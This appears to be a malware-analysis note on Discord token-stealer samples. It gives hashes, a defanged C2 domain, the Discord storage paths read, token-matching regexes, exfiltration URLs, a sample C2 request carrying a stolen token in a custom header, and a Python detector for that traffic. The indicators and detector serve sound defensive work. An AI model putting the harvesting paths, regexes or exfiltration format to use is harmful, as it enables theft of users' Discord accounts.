dd9500549f285c9095198f81a1aeff4910dd361ee79ed0fb9bc103e3a70837c5

C2: centralcity.brazilsouth.cloudapp[.]azure[.]com (191.239.244.78)

The sample checks for the following Discord installation directories:

Roaming\discord
Roaming\discordptb
Roaming\discordcanary

If one is found, it reads the files under Local Storage\leveldb\ in that directory and searches their contents for tokens with these regex patterns:

mfa\.[\w-]{84}
[\w-]{24}\.[\w-]{6}\.[\w-]{27}

Sends the collected data to

hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/brancao

Another sample (c16c3e17fa5eb849033825b24c813242be3fcd9e1b48ea52c816a9b0b8d6e856) sends to

hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/wl

Another sample (ced418253024655d11588b97aba24aad3e80d215a1ed4ca1f7a8bf8ecf623216) sends to

hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/tokyo

C2 traffic looks like this; the token is carried in the custom Sharkflow header:

```http
GET /brancao HTTP/1.1
Host: centralcity.brazilsouth.cloudapp[.]azure[.]com
User-Agent: Go-http-client/1.1
Content-Length: 23
Sharkflow: mfa.012345678901234567890123456789012345678901234567890123456789012345678901234567891234
Accept-Encoding: gzip

{"foda-se": "kkkkkkkk"}
```
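As an added detection example (not part of the original note), a small Python checker that flags a raw HTTP request matching the indicators above: the C2 host, the three exfil paths, the Go default User-Agent combined with the Sharkflow header, and a Sharkflow value shaped like either token regex. The sample request is constructed to mirror the one shown above; the indicator names are assumptions.

```python
import re

# Indicators from the note above (domain kept defanged, refanged at load).
C2_HOST = "centralcity.brazilsouth.cloudapp[.]azure[.]com".replace("[.]", ".")
C2_PATHS = {"/brancao", "/wl", "/tokyo"}
STEALER_UA = "Go-http-client/1.1"
# The two token shapes the stealer searches for, as given in the note.
TOKEN_PATTERNS = [
    re.compile(r"mfa\.[\w-]{84}"),
    re.compile(r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}"),
]

def parse_request(raw: str) -> tuple:
    """Split a raw HTTP/1.1 request into (path, lower-cased header map)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.splitlines()
    _method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return path, headers

def detect(raw: str) -> list:
    """Return the names of the indicators matched by one raw HTTP request."""
    path, headers = parse_request(raw)
    hits = []
    if headers.get("host", "").lower() == C2_HOST:
        hits.append("c2_host")
    if path in C2_PATHS:
        hits.append("c2_path")
    # Default Go client UA together with the stealer's custom header.
    if headers.get("user-agent") == STEALER_UA and "sharkflow" in headers:
        hits.append("sharkflow_header")
    # The custom header carries a value shaped like a Discord token.
    token = headers.get("sharkflow", "")
    if any(p.fullmatch(token) for p in TOKEN_PATTERNS):
        hits.append("token_in_sharkflow")
    return hits

# Constructed sample mirroring the C2 request in the note: "mfa." plus 84
# token characters, exfiltrated in the Sharkflow header.
SAMPLE_TOKEN = "mfa." + "0123456789" * 8 + "1234"
SAMPLE_REQUEST = "\r\n".join([
    "GET /brancao HTTP/1.1", f"Host: {C2_HOST}", f"User-Agent: {STEALER_UA}",
    "Content-Length: 23", f"Sharkflow: {SAMPLE_TOKEN}", "Accept-Encoding: gzip",
    "", '{"foda-se": "kkkkkkkk"}',
])
```

Calling `detect(SAMPLE_REQUEST)` returns all four indicator names; a request that only shares the Go User-Agent, without the Sharkflow header, produces no header hit, which keeps the rule from firing on ordinary Go clients.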